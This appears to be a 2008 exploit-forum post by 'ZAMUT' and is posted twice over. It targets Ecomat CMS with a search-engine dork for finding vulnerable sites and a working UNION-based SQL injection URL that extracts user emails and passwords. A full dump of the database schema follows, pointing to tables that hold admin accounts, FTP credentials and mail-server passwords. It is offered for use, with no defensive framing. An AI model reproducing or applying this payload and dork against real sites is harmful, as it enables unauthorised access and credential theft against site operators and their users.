ZAMUT
08.07.2008, 20:36
Ecomat CMS
Site: http://ecomat.ch
Cost: CHF 320
Dork: inurl:mhs codefabrik
Remote SQL Injection:
/index.php?type=web&lang=de&show=-1+UNION+SELECT+unhex(hex(concat_ws(0x3a,email,pass word)))+FROM+ecouser+LIMIT+0,1/*
Structure db:
Table [information_schema]
Table [VIEWS]
TABLE_SCHEMA
TABLE_NAME
VIEW_DEFINITION
CHECK_OPTION
IS_UPDATABLE
DEFINER
SECURITY_TYPE
Table [db2075401]
Table [ID_TABLE]
TABLE_NAME
NEXT_ID
QUANTITY
Table [ecodatasource]
description
publicData
privateData
Table [ecodatastore]
validFrom
validTill
content
description
elementTemplate
linkTarget
sortkey
sourceNum
itemStatus
owner
creator
creationDate
changeDate
Table [ecoelementstatus]
description
published
preview
hidden
Table [ecoextranetaccount]
login
password
name
prename
email
sourceNum
template
langIso
Table [ecogroupdefinition]
description
Table [ecohistory]
dataNum
userNum
entrytime
oldContent
newContent
Table [ecolang]
description
Table [ecolangitems]
langIso
itemNr
textData
Table [ecolog]
logtext
Table [ecomailaddress]
recpt_name
recpt_prename
recpt_address
recpt_zip
recpt_city
recpt_country
recpt_data
recpt_email
recpt_phone
lastSent
added
categories
Table [ecomaillist]
listName
Table [ecomailmessage]
messageRecipient
messageSender
messageSubject
messageText
messageSent
messageRead
messageDatastore
messageHierarchy
messageExtranet
Table [ecopagedefinition]
pageIdent
sourceNum
description
openTarget
contentType
destinationUrl
allowedElements
Table [ecopagehierarchy]
hierarchyNum
parentHierarchyNum
childGroupNum
childPageNum
template
hierarchySort
hideInWebmenu
Table [ecopagehierarchytype]
menuIdent
Table [ecosessions]
lastuse
regtime
Table [ecosystemsettings]
startpage
starthierarchy
ftphost
ftpuser
ftppassword
ftpimagedir
ftpstartdir
mailingpopserver
mailingpopusername
mailingpoppassword
mailingsmtpserver
mailingsmtpusername
mailingsmtppassword
mailingsenderaddress
Table [ecouser]
password
isAdmin
name
prename
dept
email
hasExtranet
hasMailing
hasBibliothek
canSeeAllPages
newElementStatus
userGroupNum
ecomatSettings
lastLogin
menuNum
menuCanBeSwitched
mediaStartDir
userImage
mediasLocked
extraneousElementsLocked
hasInternet
hasChch
hasOfflinemedien
Table [ecousergroup]
name
Table [ecouserright]
userNum
userGroupNum
allowNew
allowDelete
allowPublish
pageNum
allowSave
Table [ecoworkflow]
status
actionId
pageNr
Table [ecoworkflowaction]
wfdescription
wfuserData
Author: ZAMUT (c)
Site: http://ecomat.ch
Cost: CHF 320
Dork: inurl:mhs codefabrik
Remote SQL Injection:
/index.php?type=web&lang=de&show=-1+UNION+SELECT+unhex(hex(concat_ws(0x3a,email,pass word)))+FROM+ecouser+LIMIT+0,1/*
Structure db:
Table [information_schema]
Table [VIEWS]
TABLE_SCHEMA
TABLE_NAME
VIEW_DEFINITION
CHECK_OPTION
IS_UPDATABLE
DEFINER
SECURITY_TYPE
Table [db2075401]
Table [ID_TABLE]
TABLE_NAME
NEXT_ID
QUANTITY
Table [ecodatasource]
description
publicData
privateData
Table [ecodatastore]
validFrom
validTill
content
description
elementTemplate
linkTarget
sortkey
sourceNum
itemStatus
owner
creator
creationDate
changeDate
Table [ecoelementstatus]
description
published
preview
hidden
Table [ecoextranetaccount]
login
password
name
prename
sourceNum
template
langIso
Table [ecogroupdefinition]
description
Table [ecohistory]
dataNum
userNum
entrytime
oldContent
newContent
Table [ecolang]
description
Table [ecolangitems]
langIso
itemNr
textData
Table [ecolog]
logtext
Table [ecomailaddress]
recpt_name
recpt_prename
recpt_address
recpt_zip
recpt_city
recpt_country
recpt_data
recpt_email
recpt_phone
lastSent
added
categories
Table [ecomaillist]
listName
Table [ecomailmessage]
messageRecipient
messageSender
messageSubject
messageText
messageSent
messageRead
messageDatastore
messageHierarchy
messageExtranet
Table [ecopagedefinition]
pageIdent
sourceNum
description
openTarget
contentType
destinationUrl
allowedElements
Table [ecopagehierarchy]
hierarchyNum
parentHierarchyNum
childGroupNum
childPageNum
template
hierarchySort
hideInWebmenu
Table [ecopagehierarchytype]
menuIdent
Table [ecosessions]
lastuse
regtime
Table [ecosystemsettings]
startpage
starthierarchy
ftphost
ftpuser
ftppassword
ftpimagedir
ftpstartdir
mailingpopserver
mailingpopusername
mailingpoppassword
mailingsmtpserver
mailingsmtpusername
mailingsmtppassword
mailingsenderaddress
Table [ecouser]
password
isAdmin
name
prename
dept
hasExtranet
hasMailing
hasBibliothek
canSeeAllPages
newElementStatus
userGroupNum
ecomatSettings
lastLogin
menuNum
menuCanBeSwitched
mediaStartDir
userImage
mediasLocked
extraneousElementsLocked
hasInternet
hasChch
hasOfflinemedien
Table [ecousergroup]
name
Table [ecouserright]
userNum
userGroupNum
allowNew
allowDelete
allowPublish
pageNum
allowSave
Table [ecoworkflow]
status
actionId
pageNr
Table [ecoworkflowaction]
wfdescription
wfuserData
Author: ZAMUT (c)